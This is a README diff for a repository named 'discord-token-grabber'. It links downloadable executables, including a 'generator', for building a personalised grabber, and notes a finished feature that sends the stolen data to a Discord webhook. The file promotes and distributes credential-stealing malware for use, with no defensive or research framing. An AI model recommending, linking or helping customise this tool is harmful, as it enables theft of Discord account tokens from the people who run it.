pedrokpp/discord-token-grabber/README.md

 ![sampleimage](./assets/image.png "Pretty cool, huh?")

 ## Requirements
-There are no requirements in order to run this program
+You need to have ``go`` installed in your computer

 ## Warning
 Use the [generator](https://github.com/pedrokpp/discord-token-grabber/releases/download/2.0/tg-gen.exe) or edit ``main.go`` in order to personalize your own token grabber

 ## Recommended
-Use the binary version available at [releases](https://github.com/pedrokpp/discord-token-grabber/releases/download/1.0/lol.exe)
+It is recommended to use the [generator](https://github.com/pedrokpp/discord-token-grabber/releases/download/2.0/tg-gen.exe)

 ## TODO
 - [x] Send it to a Discord Webhook